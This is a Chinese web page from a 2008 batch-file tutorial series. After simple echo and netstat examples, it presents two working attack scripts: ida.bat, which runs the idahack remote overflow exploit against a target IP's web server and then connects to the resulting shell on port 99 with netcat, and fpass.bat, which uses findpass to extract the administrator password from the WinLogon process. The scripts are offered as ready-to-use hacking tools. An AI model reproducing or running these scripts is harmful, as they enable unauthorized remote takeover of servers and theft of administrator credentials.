|
BAT教程全集(22)
|
|
来源: 作者:方舟 发布时间:2008-08-17
|
|
stvista
###################################################################### 4. 简单批处理文件概念 ###################################################################### echo This is test > a.txt type a.txt echo This is test 11111 >> a.txt type a.txt echo This is test 22222 > a.txt type a.txt 第二个echo是追加 第三个echo将清空a.txt 重新创建 a.txt netstat -n | find "3389" 这个将要列出所有连接3389的用户的ip. ________________test.bat___________________________________________________ @echo please care echo plese care 1111 echo plese care 2222 echo plese care 3333 @echo please care @echo plese care 1111 @echo plese care 2222 @echo plese care 3333 rem 不显示注释语句,本行显示 @rem 不显示注释语句,本行不显示 @if exist %windir%system32find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe) @if exist %windir%system32fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe) ___________________________________________________________________________ 下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的. ___________________ida.bat_________________________________________________ @rem ver 1.0 @if NOT exist %windir%system32idahack.exe echo "ERROR: dont find idahack.exe" @if NOT exist %windir%system32nc.exe echo "ERROR: dont find nc.exe" @if "%1" =="" goto USAGE @if NOT "%2" =="" goto SP2 :start @echo Now start ... @ping %1 @echo chinese win2k:1 sp1:2 sp2:3 idahack.exe %1 80 1 99 >%temp%_tmp @echo "prog exit code [%errorlevel%] idahack.exe" @type %temp%_tmp @find "good luck :)" %temp%_tmp @echo "prog exit code [%errorlevel%] find [goog luck]" @if NOT errorlevel 1 nc.exe %1 99 @goto END :SP2 @idahack.exe %1 80 %2 99 %temp%_tmp @type %temp%_tmp @find "good luck :)" %temp%_tmp @if NOT errorlevel 1 nc.exe %1 99 @goto END :USAGE @echo Example: ida.bat IP @echo Example: ida.bat IP (2,3) :END _____________________ida.bat__END_________________________________ 下面我们再来第二个文件.就是得到administrator的口令. 大多数人说得不到.其实是自己的没有输入正确的信息. ___________________________fpass.bat____________________________________________ @rem ver 1.0 @if NOT exist %windir%system32findpass.exe echo "ERROR: dont find findpass.exe" @if NOT exist %windir%system32pulist.exe echo "ERROR: dont find pulist.exe" @echo start.... @echo ____________________________________ @if "%1"=="" goto USAGE @findpass.exe %1 %2 %3 >> %temp%_findpass.txt @echo "prog exit code [%errorlevel%] findpass.exe" @type %temp%_findpass.txt @echo ________________________________Here__pass★★★★★★★★ @ipconfig /all >>%temp%_findpass.txt @goto END :USAGE @pulist.exe >%temp%_pass.txt @findstr.exe /i "WINLOGON explorer internat" %temp%_pass.txt @echo "Example: fpass.bat %1 %2 %3 %4 !!!" @echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon" :END @echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator " @echo " fpass.bat end [%errorlevel%] !" _________________fpass.bat___END___________________________________________________________
|
|
|
|
[ 收藏]
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
|